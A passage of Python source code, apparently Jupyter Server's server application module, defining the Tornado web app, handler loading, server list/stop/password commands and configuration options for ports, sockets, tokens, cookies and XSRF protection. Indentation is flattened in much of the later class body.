        "jupyter_server.services.kernelspecs.handlers",
    ],
    nbconvert=["jupyter_server.nbconvert.handlers", "jupyter_server.services.nbconvert.handlers"],
    security=["jupyter_server.services.security.handlers"],
    sessions=["jupyter_server.services.sessions.handlers"],
    shutdown=["jupyter_server.services.shutdown"],
    view=["jupyter_server.view.handlers"],
)

# Added for backwards compatibility from classic notebook server.
DEFAULT_SERVER_PORT = DEFAULT_JUPYTER_SERVER_PORT
# -----------------------------------------------------------------------------
# Helper functions
# -----------------------------------------------------------------------------
def random_ports(port, n):
    """Yield n candidate ports near *port*.

    The first min(5, n) ports are sequential starting at *port*; any
    remaining n-5 are drawn uniformly from [port-2*n, port+2*n], clamped
    to be at least 1.
    """
    sequential = min(5, n)
    for offset in range(sequential):
        yield port + offset
    for _ in range(n - 5):
        yield max(1, port + random.randint(-2 * n, 2 * n))
def load_handlers(name):
    """Return the ``default_handlers`` list exported by module *name*."""
    # A non-empty fromlist makes __import__ return the leaf module itself
    # rather than the top-level package.
    leaf = __import__(name, fromlist=["default_handlers"])
    return leaf.default_handlers
# -----------------------------------------------------------------------------
# The Tornado web application
# -----------------------------------------------------------------------------
class ServerWebApplication(web.Application):
    """The Tornado web application serving all Jupyter server endpoints."""

    def __init__(
        self,
        jupyter_app,
        default_services,
        kernel_manager,
        contents_manager,
        session_manager,
        kernel_spec_manager,
        config_manager,
        extra_services,
        log,
        base_url,
        default_url,
        settings_overrides,
        jinja_env_options,
    ):
        """Assemble tornado settings, then install the handler table."""
        settings = self.init_settings(
            jupyter_app,
            kernel_manager,
            contents_manager,
            session_manager,
            kernel_spec_manager,
            config_manager,
            extra_services,
            log,
            base_url,
            default_url,
            settings_overrides,
            jinja_env_options,
        )
        handlers = self.init_handlers(default_services, settings)

        super(ServerWebApplication, self).__init__(handlers, **settings)

    def init_settings(
        self,
        jupyter_app,
        kernel_manager,
        contents_manager,
        session_manager,
        kernel_spec_manager,
        config_manager,
        extra_services,
        log,
        base_url,
        default_url,
        settings_overrides,
        jinja_env_options=None,
    ):
        """Build the tornado settings dict from the ServerApp's configuration.

        *settings_overrides* is applied last and wins over everything else.
        """
        _template_path = settings_overrides.get(
            "template_path",
            jupyter_app.template_file_path,
        )
        if isinstance(_template_path, str):
            _template_path = (_template_path,)
        template_path = [os.path.expanduser(path) for path in _template_path]

        jenv_opt = {"autoescape": True}
        jenv_opt.update(jinja_env_options if jinja_env_options else {})

        env = Environment(
            loader=FileSystemLoader(template_path), extensions=["jinja2.ext.i18n"], **jenv_opt
        )
        sys_info = get_sys_info()

        # If the user is running the server in a git directory, make the assumption
        # that this is a dev install and suggest to the developer `npm run build:watch`.
        base_dir = os.path.realpath(os.path.join(__file__, "..", ".."))
        dev_mode = os.path.exists(os.path.join(base_dir, ".git"))

        nbui = gettext.translation(
            "nbui", localedir=os.path.join(base_dir, "jupyter_server/i18n"), fallback=True
        )
        env.install_gettext_translations(nbui, newstyle=False)

        if sys_info["commit_source"] == "repository":
            # don't cache (rely on 304) when working from master
            version_hash = ""
        else:
            # reset the cache on server restart
            version_hash = datetime.datetime.now().strftime("%Y%m%d%H%M%S")

        now = utcnow()

        root_dir = contents_manager.root_dir
        home = os.path.expanduser("~")
        if root_dir.startswith(home + os.path.sep):
            # collapse $HOME to ~
            root_dir = "~" + root_dir[len(home) :]

        settings = dict(
            # basics
            log_function=log_request,
            base_url=base_url,
            default_url=default_url,
            template_path=template_path,
            static_path=jupyter_app.static_file_path,
            static_custom_path=jupyter_app.static_custom_path,
            static_handler_class=FileFindHandler,
            static_url_prefix=url_path_join(base_url, "/static/"),
            static_handler_args={
                # don't cache custom.js
                "no_cache_paths": [url_path_join(base_url, "static", "custom")],
            },
            version_hash=version_hash,
            # rate limits
            iopub_msg_rate_limit=jupyter_app.iopub_msg_rate_limit,
            iopub_data_rate_limit=jupyter_app.iopub_data_rate_limit,
            rate_limit_window=jupyter_app.rate_limit_window,
            # authentication
            cookie_secret=jupyter_app.cookie_secret,
            login_url=url_path_join(base_url, "/login"),
            login_handler_class=jupyter_app.login_handler_class,
            logout_handler_class=jupyter_app.logout_handler_class,
            password=jupyter_app.password,
            xsrf_cookies=True,
            disable_check_xsrf=jupyter_app.disable_check_xsrf,
            allow_remote_access=jupyter_app.allow_remote_access,
            local_hostnames=jupyter_app.local_hostnames,
            authenticate_prometheus=jupyter_app.authenticate_prometheus,
            # managers
            kernel_manager=kernel_manager,
            contents_manager=contents_manager,
            session_manager=session_manager,
            kernel_spec_manager=kernel_spec_manager,
            config_manager=config_manager,
            # handlers
            extra_services=extra_services,
            # Jupyter stuff
            started=now,
            # place for extensions to register activity
            # so that they can prevent idle-shutdown
            last_activity_times={},
            jinja_template_vars=jupyter_app.jinja_template_vars,
            websocket_url=jupyter_app.websocket_url,
            shutdown_button=jupyter_app.quit_button,
            config=jupyter_app.config,
            config_dir=jupyter_app.config_dir,
            allow_password_change=jupyter_app.allow_password_change,
            server_root_dir=root_dir,
            jinja2_env=env,
            terminals_available=terminado_available and jupyter_app.terminals_enabled,
            serverapp=jupyter_app,
        )

        # allow custom overrides for the tornado web app.
        settings.update(settings_overrides)

        if base_url and "xsrf_cookie_kwargs" not in settings:
            # default: set xsrf cookie on base_url
            settings["xsrf_cookie_kwargs"] = {"path": base_url}

        return settings

    def init_handlers(self, default_services, settings):
        """Load the (URL pattern, handler) tuples for each component."""
        # Order matters. The first handler to match the URL will handle the request.
        handlers = []
        # load extra services specified by users before default handlers
        for service in settings["extra_services"]:
            handlers.extend(load_handlers(service))

        # Add auth services.
        if "auth" in default_services:
            handlers.extend([(r"/login", settings["login_handler_class"])])
            handlers.extend([(r"/logout", settings["logout_handler_class"])])

        # Load default services. Raise exception if service not
        # found in JUPYTER_SERVICE_HANDLERS.
        for service in default_services:
            if service in JUPYTER_SERVICE_HANDLERS:
                locations = JUPYTER_SERVICE_HANDLERS[service]
                if locations is not None:
                    for loc in locations:
                        handlers.extend(load_handlers(loc))
            else:
                raise Exception(
                    "{} is not recognized as a jupyter_server "
                    "service. If this is a custom service, "
                    "try adding it to the "
                    "`extra_services` list.".format(service)
                )

        # Add extra handlers from contents manager.
        handlers.extend(settings["contents_manager"].get_extra_handlers())

        # If gateway mode is enabled, replace appropriate handlers to perform redirection
        if GatewayClient.instance().gateway_enabled:
            # for each handler required for gateway, locate its pattern
            # in the current list and replace that entry...
            gateway_handlers = load_handlers("jupyter_server.gateway.handlers")
            for i, gwh in enumerate(gateway_handlers):
                for j, h in enumerate(handlers):
                    if gwh[0] == h[0]:
                        handlers[j] = (gwh[0], gwh[1])
                        break

        # register base handlers last
        handlers.extend(load_handlers("jupyter_server.base.handlers"))

        if settings["default_url"] != settings["base_url"]:
            # set the URL that will be redirected from `/`
            handlers.append(
                (
                    r"/?",
                    RedirectWithParams,
                    {
                        "url": settings["default_url"],
                        "permanent": False,  # want 302, not 301
                    },
                )
            )
        else:
            handlers.append((r"/", MainHandler))

        # prepend base_url onto the patterns that we match
        new_handlers = []
        for handler in handlers:
            pattern = url_path_join(settings["base_url"], handler[0])
            new_handler = tuple([pattern] + list(handler[1:]))
            new_handlers.append(new_handler)
        # add 404 on the end, which will catch everything that falls through
        new_handlers.append((r"(.*)", Template404))
        return new_handlers

    def last_activity(self):
        """Get a UTC timestamp for when the server last did something.

        Includes: API activity, kernel activity, kernel shutdown, and terminal
        activity.
        """
        sources = [
            self.settings["started"],
            self.settings["kernel_manager"].last_kernel_activity,
        ]
        # These two keys are only present once the corresponding subsystem
        # has recorded activity, hence the EAFP lookups.
        try:
            sources.append(self.settings["api_last_activity"])
        except KeyError:
            pass
        try:
            sources.append(self.settings["terminal_last_activity"])
        except KeyError:
            pass
        sources.extend(self.settings["last_activity_times"].values())
        return max(sources)
class JupyterPasswordApp(JupyterApp):
    """Set a password for the Jupyter server.

    Setting a password secures the Jupyter server
    and removes the need for token-based authentication.
    """

    description = __doc__

    def _config_file_default(self):
        # The hashed password lives in the JSON (not .py) config file.
        return os.path.join(self.config_dir, "jupyter_server_config.json")

    def start(self):
        """Prompt for a password and write its hash to the config file."""
        from jupyter_server.auth.security import set_password

        set_password(config_file=self.config_file)
        self.log.info("Wrote hashed password to %s" % self.config_file)
def shutdown_server(server_info, timeout=5, log=None):
    """Shutdown a Jupyter server in a separate process.

    *server_info* should be a dictionary as produced by list_running_servers().

    Will first try to request shutdown using /api/shutdown .
    On Unix, if the server is still running after *timeout* seconds, it will
    send SIGTERM. After another timeout, it escalates to SIGKILL.

    Returns True if the server was stopped by any means, False if stopping it
    failed (on Windows).
    """
    # (Fixed: dropped an unused `from tornado.httpclient import ...` and the
    # unused binding of fetch()'s return value.)
    url = server_info["url"]
    pid = server_info["pid"]

    def _pid_gone():
        # Poll for up to *timeout* seconds for the process to disappear.
        for _ in range(timeout * 10):
            if not check_pid(pid):
                if log:
                    log.debug("Server PID %s is gone", pid)
                return True
            time.sleep(0.1)
        return False

    if log:
        log.debug("POST request to %sapi/shutdown", url)
    fetch(url, method="POST", headers={"Authorization": "token " + server_info["token"]})
    if _pid_gone():
        return True

    if sys.platform.startswith("win"):
        # No POSIX signals to escalate with on Windows.
        return False

    if log:
        log.debug("SIGTERM to PID %s", pid)
    os.kill(pid, signal.SIGTERM)
    if _pid_gone():
        return True

    if log:
        log.debug("SIGKILL to PID %s", pid)
    os.kill(pid, signal.SIGKILL)
    return True  # SIGKILL cannot be caught
class JupyterServerStopApp(JupyterApp):
    """CLI app that stops a running Jupyter server by port or UNIX socket."""

    version = __version__
    description = "Stop currently running Jupyter server for a given port"

    # Port of the target server; takes effect only when no socket is given.
    port = Integer(
        DEFAULT_JUPYTER_SERVER_PORT,
        config=True,
        help="Port of the server to be killed. Default %s" % DEFAULT_JUPYTER_SERVER_PORT,
    )

    # UNIX socket path of the target server; takes precedence over port.
    sock = Unicode(u"", config=True, help="UNIX socket of the server to be killed.")

    def parse_command_line(self, argv=None):
        """Interpret the single positional argument as a port or socket path."""
        super(JupyterServerStopApp, self).parse_command_line(argv)
        if self.extra_args:
            try:
                self.port = int(self.extra_args[0])
            except ValueError:
                # self.extra_args[0] was not an int, so it must be a string (unix socket).
                self.sock = self.extra_args[0]

    def shutdown_server(self, server):
        # Thin wrapper around the module-level shutdown_server().
        return shutdown_server(server, log=self.log)

    def _shutdown_or_exit(self, target_endpoint, server):
        # Exit the process with an error message if shutdown fails.
        print("Shutting down server on %s..." % target_endpoint)
        if not self.shutdown_server(server):
            sys.exit("Could not stop server on %s" % target_endpoint)

    @staticmethod
    def _maybe_remove_unix_socket(socket_path):
        # Best-effort cleanup; the socket may already be gone.
        try:
            os.unlink(socket_path)
        except (OSError, IOError):
            pass

    def start(self):
        """Find the matching running server and shut it down."""
        servers = list(list_running_servers(self.runtime_dir, log=self.log))
        if not servers:
            self.exit("There are no running servers (per %s)" % self.runtime_dir)
        for server in servers:
            if self.sock:
                sock = server.get("sock", None)
                if sock and sock == self.sock:
                    self._shutdown_or_exit(sock, server)
                    # Attempt to remove the UNIX socket after stopping.
                    self._maybe_remove_unix_socket(sock)
                    return
            elif self.port:
                port = server.get("port", None)
                if port == self.port:
                    self._shutdown_or_exit(port, server)
                    return
        # No match: report what IS running to help the user.
        current_endpoint = self.sock or self.port
        print(
            "There is currently no server running on {}".format(current_endpoint), file=sys.stderr
        )
        print("Ports/sockets currently in use:", file=sys.stderr)
        for server in servers:
            print(" - {}".format(server.get("sock") or server["port"]), file=sys.stderr)
        self.exit(1)
class JupyterServerListApp(JupyterApp):
    """List currently running Jupyter servers, in plain text or JSON."""

    version = __version__
    description = _i18n("List currently running Jupyter servers.")
    flags = dict(
        jsonlist=(
            {"JupyterServerListApp": {"jsonlist": True}},
            _i18n("Produce machine-readable JSON list output."),
        ),
        json=(
            {"JupyterServerListApp": {"json": True}},
            _i18n("Produce machine-readable JSON object on each line of output."),
        ),
    )
    jsonlist = Bool(
        False,
        config=True,
        help=_i18n(
            # Fixed typo in the displayed help text: "Jupyer" -> "Jupyter".
            "If True, the output will be a JSON list of objects, one per "
            "active Jupyter server, each with the details from the "
            "relevant server info file."
        ),
    )
    json = Bool(
        False,
        config=True,
        help=_i18n(
            "If True, each line of output will be a JSON object with the "
            "details from the server info file. For a JSON list output, "
            "see the JupyterServerListApp.jsonlist configuration value"
        ),
    )

    def start(self):
        """Print the running servers, honoring the ``json``/``jsonlist`` flags."""
        serverinfo_list = list(list_running_servers(self.runtime_dir, log=self.log))
        if self.jsonlist:
            print(json.dumps(serverinfo_list, indent=2))
        elif self.json:
            for serverinfo in serverinfo_list:
                print(json.dumps(serverinfo))
        else:
            print("Currently running servers:")
            for serverinfo in serverinfo_list:
                url = serverinfo["url"]
                if serverinfo.get("token"):
                    # Append the token so the printed URL is directly usable.
                    url = url + "?token=%s" % serverinfo["token"]
                print(url, "::", serverinfo["root_dir"])
# -----------------------------------------------------------------------------
# Aliases and Flags
# -----------------------------------------------------------------------------
# Start from the shared JupyterApp flags and extend them with server-specific
# command-line switches. Each flag maps to {ClassName: {trait: value}}.
flags = dict(base_flags)
flags["allow-root"] = (
{"ServerApp": {"allow_root": True}},
_i18n("Allow the server to be run from root user."),
)
flags["no-browser"] = (
{"ServerApp": {"open_browser": False}, "ExtensionApp": {"open_browser": False}},
_i18n("Prevent the opening of the default url in the browser."),
)
flags["debug"] = (
{"ServerApp": {"log_level": "DEBUG"}, "ExtensionApp": {"log_level": "DEBUG"}},
_i18n("Set debug level for the extension and underlying server applications."),
)
flags["autoreload"] = (
{"ServerApp": {"autoreload": True}},
"""Autoreload the webapp
Enable reloading of the tornado webapp and all imported Python packages
when any changes are made to any Python src files in server or
extensions.
""",
)
# Add notebook manager flags
# (kept only for backward compatibility; the trait is ignored).
flags.update(
boolean_flag(
"script", "FileContentsManager.save_script", "DEPRECATED, IGNORED", "DEPRECATED, IGNORED"
)
)
# Aliases map short command-line option names to fully-qualified traits.
aliases = dict(base_aliases)
aliases.update(
{
"ip": "ServerApp.ip",
"port": "ServerApp.port",
"port-retries": "ServerApp.port_retries",
"sock": "ServerApp.sock",
"sock-mode": "ServerApp.sock_mode",
"transport": "KernelManager.transport",
"keyfile": "ServerApp.keyfile",
"certfile": "ServerApp.certfile",
"client-ca": "ServerApp.client_ca",
"notebook-dir": "ServerApp.root_dir",
"preferred-dir": "ServerApp.preferred_dir",
"browser": "ServerApp.browser",
"pylab": "ServerApp.pylab",
"gateway-url": "GatewayClient.url",
}
)
# -----------------------------------------------------------------------------
# ServerApp
# -----------------------------------------------------------------------------
# NOTE: the class body continues beyond this chunk of the file.
class ServerApp(JupyterApp):
name = "jupyter-server"
version = __version__
description = _i18n(
"""The Jupyter Server.
This launches a Tornado-based Jupyter Server."""
)
examples = _examples
# Command-line flags/aliases assembled at module level above.
flags = Dict(flags)
aliases = Dict(aliases)
# Configurable classes surfaced via --help-all and config files.
classes = [
KernelManager,
Session,
MappingKernelManager,
KernelSpecManager,
AsyncMappingKernelManager,
ContentsManager,
FileContentsManager,
AsyncContentsManager,
AsyncFileContentsManager,
NotebookNotary,
GatewayMappingKernelManager,
GatewayKernelSpecManager,
GatewaySessionManager,
GatewayClient,
]
if terminado_available: # Only necessary when terminado is available
classes.append(TerminalManager)
# Subcommands: `jupyter server list|stop|password|extension`.
subcommands = dict(
list=(JupyterServerListApp, JupyterServerListApp.description.splitlines()[0]),
stop=(JupyterServerStopApp, JupyterServerStopApp.description.splitlines()[0]),
password=(JupyterPasswordApp, JupyterPasswordApp.description.splitlines()[0]),
extension=(ServerExtensionApp, ServerExtensionApp.description.splitlines()[0]),
)
# A list of services whose handlers will be exposed.
# Subclasses can override this list to
# expose a subset of these handlers.
default_services = (
"api",
"auth",
"config",
"contents",
"files",
"kernels",
"kernelspecs",
"nbconvert",
"security",
"sessions",
"shutdown",
"view",
)
_log_formatter_cls = LogFormatter
@default("log_level")
def _default_log_level(self):
# INFO-level logging unless configured otherwise.
return logging.INFO
@default("log_format")
def _default_log_format(self):
"""override default log format to include date & time"""
return u"%(color)s[%(levelname)1.1s %(asctime)s.%(msecs).03d %(name)s]%(end_color)s %(message)s"
# file to be opened in the Jupyter server
file_to_run = Unicode("", help="Open the named file when the application is launched.").tag(
config=True
)
file_url_prefix = Unicode(
"notebooks", help="The URL prefix where files are opened directly."
).tag(config=True)
# Network related information
allow_origin = Unicode(
"",
config=True,
help="""Set the Access-Control-Allow-Origin header
Use '*' to allow any origin to access your server.
Takes precedence over allow_origin_pat.
""",
)
allow_origin_pat = Unicode(
"",
config=True,
help="""Use a regular expression for the Access-Control-Allow-Origin header
Requests from an origin matching the expression will get replies with:
Access-Control-Allow-Origin: origin
where `origin` is the origin of the request.
Ignored if allow_origin is set.
""",
)
allow_credentials = Bool(
False, config=True, help=_i18n("Set the Access-Control-Allow-Credentials: true header")
)
allow_root = Bool(
False, config=True, help=_i18n("Whether to allow the user to run the server as root.")
)
autoreload = Bool(
False,
config=True,
help=_i18n("Reload the webapp when changes are made to any Python src files."),
)
default_url = Unicode("/", config=True, help=_i18n("The default URL to redirect to from `/`"))
ip = Unicode(
"localhost", config=True, help=_i18n("The IP address the Jupyter server will listen on.")
)
@default("ip")
def _default_ip(self):
    """Return localhost if available, 127.0.0.1 otherwise.

    On some (horribly broken) systems, localhost cannot be bound, so a
    throwaway socket is used to probe before committing to the default.
    """
    probe = socket.socket()
    try:
        probe.bind(("localhost", 0))
    except socket.error as e:
        self.log.warning(
            _i18n("Cannot bind to localhost, using 127.0.0.1 as default ip\n%s"), e
        )
        return "127.0.0.1"
    else:
        return "localhost"
    finally:
        # Always release the probe socket; the original leaked it when the
        # bind failed.
        probe.close()
@validate("ip")
def _validate_ip(self, proposal):
    """Normalize the ip trait: '*' means 'bind all interfaces' (empty string)."""
    candidate = proposal["value"]
    return u"" if candidate == u"*" else candidate
custom_display_url = Unicode(
u"",
config=True,
help=_i18n(
"""Override URL shown to users.
Replace actual URL, including protocol, address, port and base URL,
with the given value when displaying URL to the users. Do not change
the actual connection URL. If authentication token is enabled, the
token is added to the custom URL automatically.
This option is intended to be used when the URL to display to the user
cannot be determined reliably by the Jupyter server (proxified
or containerized setups for example)."""
),
)
# Environment variable and fallback used by the port default below.
port_env = "JUPYTER_PORT"
port_default_value = DEFAULT_JUPYTER_SERVER_PORT
port = Integer(
config=True, help=_i18n("The port the server will listen on (env: JUPYTER_PORT).")
)
@default("port")
def port_default(self):
# JUPYTER_PORT wins over the built-in default.
return int(os.getenv(self.port_env, self.port_default_value))
port_retries_env = "JUPYTER_PORT_RETRIES"
port_retries_default_value = 50
port_retries = Integer(
port_retries_default_value,
config=True,
help=_i18n(
"The number of additional ports to try if the specified port is not "
"available (env: JUPYTER_PORT_RETRIES)."
),
)
@default("port_retries")
def port_retries_default(self):
# JUPYTER_PORT_RETRIES wins over the built-in default.
return int(os.getenv(self.port_retries_env, self.port_retries_default_value))
sock = Unicode(u"", config=True, help="The UNIX socket the Jupyter server will listen on.")
sock_mode = Unicode(
"0600", config=True, help="The permissions mode for UNIX socket creation (default: 0600)."
)
@validate("sock_mode")
def _validate_sock_mode(self, proposal):
    """Validate sock_mode: an octal string granting at least u+rw.

    Raises TraitError when the value is not valid octal or lacks the
    required owner read/write bits.
    """
    value = proposal["value"]
    try:
        converted_value = int(value.encode(), 8)
    except ValueError:
        raise TraitError('invalid --sock-mode value: %s, please specify as e.g. "0600"' % value)
    # Use explicit checks instead of `assert`: assertions are stripped under
    # `python -O`, which silently disabled this validation in the original.
    if not (
        # Ensure the mode is at least user readable/writable.
        bool(converted_value & stat.S_IRUSR)
        and bool(converted_value & stat.S_IWUSR)
        # And isn't out of bounds.
        and converted_value <= 2 ** 12
    ):
        raise TraitError(
            "invalid --sock-mode value: %s, must have u+rw (0600) at a minimum" % value
        )
    return value
# TLS configuration: certificate, private key, and optional client CA.
certfile = Unicode(
u"", config=True, help=_i18n("""The full path to an SSL/TLS certificate file.""")
)
keyfile = Unicode(
u"",
config=True,
help=_i18n("""The full path to a private key file for usage with SSL/TLS."""),
)
client_ca = Unicode(
u"",
config=True,
help=_i18n(
"""The full path to a certificate authority certificate for SSL/TLS client authentication."""
),
)
cookie_secret_file = Unicode(
config=True, help=_i18n("""The file where the cookie secret is stored.""")
)
@default("cookie_secret_file")
def _default_cookie_secret_file(self):
# Stored alongside other runtime files (pid/info files).
return os.path.join(self.runtime_dir, "jupyter_cookie_secret")
cookie_secret = Bytes(
b"",
config=True,
help="""The random bytes used to secure cookies.
By default this is a new random number every time you start the server.
Set it to a value in a config file to enable logins to persist across server sessions.
Note: Cookie secrets should be kept private, do not share config files with
cookie_secret stored in plaintext (you can read the value from a file).
""",
)
@default("cookie_secret")
def _default_cookie_secret(self):
    """Load the cookie key from disk, or create and persist a fresh one.

    The returned secret is an HMAC-SHA256 of the key and the configured
    password, so changing the password invalidates existing cookies.
    """
    secret_path = self.cookie_secret_file
    if os.path.exists(secret_path):
        with io.open(secret_path, "rb") as handle:
            key = handle.read()
    else:
        key = encodebytes(os.urandom(32))
        self._write_cookie_secret_file(key)
    digest = hmac.new(key, digestmod=hashlib.sha256)
    digest.update(self.password.encode())
    return digest.digest()
def _write_cookie_secret_file(self, secret):
    """Persist *secret* to cookie_secret_file with restrictive permissions."""
    self.log.info(_i18n("Writing Jupyter server cookie secret to %s"), self.cookie_secret_file)
    try:
        with secure_write(self.cookie_secret_file, True) as handle:
            handle.write(secret)
    except OSError as err:
        # Best-effort: a failed write is logged, not fatal.
        self.log.error(
            _i18n("Failed to write cookie secret to %s: %s"), self.cookie_secret_file, err
        )
token = Unicode(
"<generated>",
help=_i18n(
"""Token used for authenticating first-time connections to the server.
The token can be read from the file referenced by JUPYTER_TOKEN_FILE or set directly
with the JUPYTER_TOKEN environment variable.
When no password is enabled,
the default is to generate a new, random token.
Setting to an empty string disables authentication altogether, which is NOT RECOMMENDED.
"""
),
).tag(config=True)
# True when the token was auto-generated (vs supplied by user/env/file);
# kept in sync by _token_default and the "token" observer below.
_token_generated = True
@default("token")
def _token_default(self):
    """Resolve the auth token: env var, token file, password, or random.

    Also records in _token_generated whether the value was generated here
    (True only for the random fallback).
    """
    env_token = os.getenv("JUPYTER_TOKEN")
    if env_token:
        self._token_generated = False
        return env_token
    token_path = os.getenv("JUPYTER_TOKEN_FILE")
    if token_path:
        self._token_generated = False
        with io.open(token_path, "r") as token_file:
            return token_file.read()
    if self.password:
        # no token if password is enabled
        self._token_generated = False
        return u""
    self._token_generated = True
    return binascii.hexlify(os.urandom(24)).decode("ascii")
min_open_files_limit = Integer(
config=True,
help="""
Gets or sets a lower bound on the open file handles process resource
limit. This may need to be increased if you run into an
OSError: [Errno 24] Too many open files.
This is not applicable when running on Windows.
""",
# None means "do not adjust" (e.g. when the resource module is absent).
allow_none=True,
)
@default("min_open_files_limit")
def _default_min_open_files_limit(self):
    """Choose a soft NOFILE target, or None when limits can't be adjusted."""
    if resource is None:
        # Ignoring min_open_files_limit because the limit cannot be adjusted (for example, on Windows)
        return None
    soft_limit, hard_limit = resource.getrlimit(resource.RLIMIT_NOFILE)
    desired = 4096
    if hard_limit >= desired:
        return desired
    # The hard limit caps what we may request; fall back to the current soft limit.
    self.log.debug(
        "Default value for min_open_files_limit is ignored (hard=%r, soft=%r)", hard_limit, soft_limit
    )
    return soft_limit
# Tornado request-size limits (bytes).
max_body_size = Integer(
512 * 1024 * 1024,
config=True,
help="""
Sets the maximum allowed size of the client request body, specified in
the Content-Length request header field. If the size in a request
exceeds the configured value, a malformed HTTP message is returned to
the client.
Note: max_body_size is applied even in streaming mode.
""",
)
max_buffer_size = Integer(
512 * 1024 * 1024,
config=True,
help="""
Gets or sets the maximum amount of memory, in bytes, that is allocated
for use by the buffer manager.
""",
)
@observe("token")
def _token_changed(self, change):
# An explicitly-set token is, by definition, not generated.
self._token_generated = False
# Authentication configuration.
password = Unicode(
u"",
config=True,
help="""Hashed password to use for web authentication.
To generate, type in a python/IPython shell:
from jupyter_server.auth import passwd; passwd()
The string should be of the form type:salt:hashed-password.
""",
)
password_required = Bool(
False,
config=True,
help="""Forces users to use a password for the Jupyter server.
This is useful in a multi user environment, for instance when
everybody in the LAN can access each other's machine through ssh.
In such a case, serving on localhost is not secure since
any user can connect to the Jupyter server via ssh.
""",
)
allow_password_change = Bool(
True,
config=True,
help="""Allow password to be changed at login for the Jupyter server.
While logging in with a token, the Jupyter server UI will give the opportunity to
the user to enter a new password at the same time that will replace
the token login mechanism.
This can be set to false to prevent changing password from the UI/API.
""",
)
disable_check_xsrf = Bool(
False,
config=True,
help="""Disable cross-site-request-forgery protection
Jupyter notebook 4.3.1 introduces protection from cross-site request forgeries,
requiring API requests to either:
- originate from pages served by this server (validated with XSRF cookie and token), or
- authenticate with a token
Some anonymous compute resources still desire the ability to run code,
completely without authentication.
These services can disable all authentication and security checks,
with the full knowledge of what that implies.
""",
)
allow_remote_access = Bool(
config=True,
help="""Allow requests where the Host header doesn't point to a local server
By default, requests get a 403 forbidden response if the 'Host' header
shows that the browser thinks it's on a non-local domain.
Setting this option to True disables this check.
This protects against 'DNS rebinding' attacks, where a remote web server
serves you a page and then changes its DNS to send later requests to a
local IP, bypassing same-origin checks.
Local IP addresses (such as 127.0.0.1 and ::1) are allowed as local,
along with hostnames configured in local_hostnames.
""",
)
@default("allow_remote_access")
def _default_allow_remote(self):
"""Disallow remote access if we're listening only on loopback addresses"""
# if blank, self.ip was configured to "*" meaning bind to all interfaces,
# see _valdate_ip
if self.ip == "":
return True
try:
addr = ipaddress.ip_address(self.ip)
except ValueError:
# Address is a hostname
# Resolve it and allow remote access if ANY resolved address
# is non-loopback.
for info in socket.getaddrinfo(self.ip, self.port, 0, socket.SOCK_STREAM):
addr = info[4][0]
try:
parsed = ipaddress.ip_address(addr.split("%")[0])
except ValueError:
self.log.warning("Unrecognised IP address: %r", addr)
continue
# Macs map localhost to 'fe80::1%lo0', a link local address
# scoped to the loopback interface. For now, we'll assume that
# any scoped link-local address is effectively local.
if not (parsed.is_loopback or (("%" in addr) and parsed.is_link_local)):
return True
return False
else:
# self.ip was a literal IP address: local iff it is loopback.
return not addr.is_loopback
# Browser-launch behavior.
use_redirect_file = Bool(
True,
config=True,
help="""Disable launching browser by redirect file
For versions of notebook > 5.7.2, a security feature measure was added that
prevented the authentication token used to launch the browser from being visible.
This feature makes it difficult for other users on a multi-user system from
running code in your Jupyter session as you.
However, some environments (like Windows Subsystem for Linux (WSL) and Chromebooks),
launching a browser using a redirect file can lead the browser failing to load.
This is because of the difference in file structures/paths between the runtime and
the browser.
Disabling this setting to False will disable this behavior, allowing the browser
to launch by using a URL and visible token (as before).
""",
)
local_hostnames = List(
Unicode(),
["localhost"],
config=True,
help="""Hostnames to allow as local when allow_remote_access is False.
Local IP addresses (such as 127.0.0.1 and ::1) are automatically accepted
as local as well.
""",
)
open_browser = Bool(
False,
config=True,
help="""Whether to open in a browser after starting.
The specific browser used is platform dependent and
determined by the python standard library `webbrowser`
module, unless it is overridden using the --browser
(ServerApp.browser) configuration option.
""",
)
browser = Unicode(
u"",
config=True,
help="""Specify what command to use to invoke a web
browser when starting the server. If not specified, the
default browser will be determined by the `webbrowser`
standard library module, which allows setting of the
BROWSER environment variable to override it.
""",
)
webbrowser_open_new = Integer(
2,
config=True,
help=_i18n(
"""Specify where to open the server on startup. This is the
`new` argument passed to the standard library method `webbrowser.open`.
The behaviour is not guaranteed, but depends on browser support. Valid
values are:
- 2 opens a new tab,
- 1 opens a new window,
- 0 opens in an existing window.
See the `webbrowser.open` documentation for details.
"""
),
)
# Escape hatches for tornado/terminado configuration.
tornado_settings = Dict(
config=True,
help=_i18n(
"Supply overrides for the tornado.web.Application that the " "Jupyter server uses."
),
)
websocket_compression_options = Any(
None,
config=True,
help=_i18n(
"""
Set the tornado compression options for websocket connections.
This value will be returned from :meth:`WebSocketHandler.get_compression_options`.
None (default) will disable compression.
A dict (even an empty one) will enable compression.
See the tornado docs for WebSocketHandler.get_compression_options for details.
"""
),
)
terminado_settings = Dict(
config=True,
help=_i18n('Supply overrides for terminado. Currently only supports "shell_command".'),
)
cookie_options = Dict(
config=True,
help=_i18n(
"Extra keyword arguments to pass to `set_secure_cookie`."
" See tornado's set_secure_cookie docs for details."
),
)
get_secure_cookie_kwargs = Dict(
config=True,
help=_i18n(
"Extra keyword arguments to pass to `get_secure_cookie`."
" See tornado's get_secure_cookie docs for details."
),
)
ssl_options = Dict(
allow_none=True,
config=True,
help=_i18n(
"""Supply SSL options for the tornado HTTPServer.
See the tornado docs for details."""
),
)
# Jinja templating configuration.
jinja_environment_options = Dict(
config=True, help=_i18n("Supply extra arguments that will be passed to Jinja environment.")
)
jinja_template_vars = Dict(
config=True,
help=_i18n("Extra variables to supply to jinja templates when rendering."),
)
base_url = Unicode(
"/",
config=True,
help="""The base URL for the Jupyter server.
Leading and trailing slashes can be omitted,
and will automatically be added.
""",
)
@validate("base_url")
def _update_base_url(self, proposal):
    """Normalize base_url so it always has leading and trailing slashes."""
    url = proposal["value"]
    prefixed = url if url.startswith("/") else "/" + url
    return prefixed if prefixed.endswith("/") else prefixed + "/"
extra_static_paths = List(
Unicode(),
config=True,
help="""Extra paths to search for serving static files.
This allows adding javascript/css to be available from the Jupyter server machine,
or overriding individual files in the IPython""",
)
@property
def static_file_path(self):
    """return extra paths + the default location"""
    # Extra paths take precedence over the bundled static directory.
    return [*self.extra_static_paths, DEFAULT_STATIC_FILES_PATH]
static_custom_path = List(Unicode(), help=_i18n("""Path to search for custom.js, css"""))
@default("static_custom_path")
def _default_static_custom_path(self):
# Look in the user's config dir first, then the bundled static files.
return [os.path.join(d, "custom") for d in (self.config_dir, DEFAULT_STATIC_FILES_PATH)]
extra_template_paths = List(
Unicode(),
config=True,
